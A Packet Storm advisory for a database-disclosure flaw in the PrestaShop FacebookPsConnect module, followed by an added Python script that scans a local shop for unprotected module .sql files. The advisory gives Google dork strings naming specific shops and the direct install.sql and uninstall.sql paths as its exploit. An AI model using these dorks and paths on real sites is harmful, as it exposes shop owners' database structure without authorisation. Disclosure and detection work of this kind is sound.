PrestaShop FacebookPsConnect 1.6.1.4 Database Disclosure

2018-12-24T00:00:00
ID PACKETSTORM:150903
Type packetstorm
Reporter KingSkrupellos
Modified 2018-12-24T00:00:00

Description

                                        
`#################################################################################################  
  
# Exploit Title : PrestaShop FacebookPsConnect Modules 1.6.1.4 Database Disclosure  
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army  
# Date : 24/12/2018  
# Vendor Homepage : prestashop.com ~ businesstech.fr  
# Software Download Link : modulebazaar.com/prestashop-facebook-connect.html + sourceforge.net/projects/prestashopfacebookconnect/  
# Software Installation Price : 50$  
# Tested On : Windows and Linux  
# Category : WebApps  
# Version Information : 1.4.11.0± ~ 1.5.4.0 ~ 1.5.5.0 ~ 1.5.6.1 ~ 1.5.6.2 ~ 1.6.1.4 ~ 1.6.0.9  
# Exploit Risk : Medium  
# Google Dorks : inurl:''/modules/facebookpsconnect/sql/''  
intext:''Fièrement réalisé par Mezcalito''  
intext:''Copyright 2018 / PrestaShop. Implented by DGWStudios.com & Design by LeoTheme''  
intext:''Copyrights 2012 rygeshop.dk Alle rettigheder forbeholdes''  
intext:''© 2018 Powered by Billiandi Creations Ltd™''  
intext:''© 2013 - Vinta Quatre. Tous droits réservés - Création Yellow Agence Internet''  
intext:''© 2013 oscadi.com™''  
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]  
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]  
  
#################################################################################################  
  
* PrestaShop FacebookPsConnect Modules Install Uninstall Script Database Disclosure  
  
#################################################################################################  
  
# Exploit :  
  
/modules/facebookpsconnect/sql/install.sql  
  
/modules/facebookpsconnect/sql/uninstall.sql  
  
#################################################################################################  
  
# Example Vulnerable Sites =>  
  
#################################################################################################  
  
# Discovered By Hacker KingSkrupellos from Cyberizm.Org Digital Security Team  
  
#################################################################################################  
`
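
An added defensive check, not part of the original advisory: this Python script walks a local PrestaShop document root and lists `.sql` files under `modules/` (such as the `sql/install.sql` and `sql/uninstall.sql` paths above) that no `.htaccess` deny rule covers. The function names, the `examplemodule` directory and the sample tree are constructed for illustration, and the `.htaccess` test is a heuristic that assumes Apache with overrides enabled.

```python
import os
import re
import tempfile

# Deny-all directives in Apache 2.4 and 2.2 syntax (heuristic: enclosing scope is not parsed).
DENY_RE = re.compile(r"^\s*(Require\s+all\s+denied|Deny\s+from\s+all)\b", re.I | re.M)

def is_denied(directory, docroot):
    """True if `directory` or an ancestor up to docroot has a deny-all .htaccess."""
    current, docroot = os.path.abspath(directory), os.path.abspath(docroot)
    while True:
        htaccess = os.path.join(current, ".htaccess")
        if os.path.isfile(htaccess):
            with open(htaccess, encoding="utf-8", errors="replace") as fh:
                if DENY_RE.search(fh.read()):
                    return True
        if current == docroot or os.path.dirname(current) == current:
            return False
        current = os.path.dirname(current)

def exposed_sql_files(docroot):
    """Return docroot-relative paths of module .sql files with no deny rule above them."""
    findings = []
    for dirpath, _dirs, files in os.walk(os.path.join(docroot, "modules")):
        sql = [f for f in files if f.lower().endswith(".sql")]
        if sql and not is_denied(dirpath, docroot):
            for name in sql:
                rel = os.path.relpath(os.path.join(dirpath, name), docroot)
                findings.append(rel.replace(os.sep, "/"))
    return sorted(findings)

def build_sample_tree(root):
    """Constructed sample: one unprotected module and one protected by .htaccess."""
    for module, protect in (("facebookpsconnect", False), ("examplemodule", True)):
        sql_dir = os.path.join(root, "modules", module, "sql")
        os.makedirs(sql_dir)
        for name in ("install.sql", "uninstall.sql"):
            with open(os.path.join(sql_dir, name), "w") as fh:
                fh.write("-- constructed placeholder\n")
        if protect:
            with open(os.path.join(sql_dir, ".htaccess"), "w") as fh:
                fh.write("Require all denied\n")

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        for path in exposed_sql_files(tmp):
            print("exposed:", path)
```

nginx ignores `.htaccess`, so on that server every `.sql` file found under `modules/` should be treated as exposed until a server-level rule blocks it.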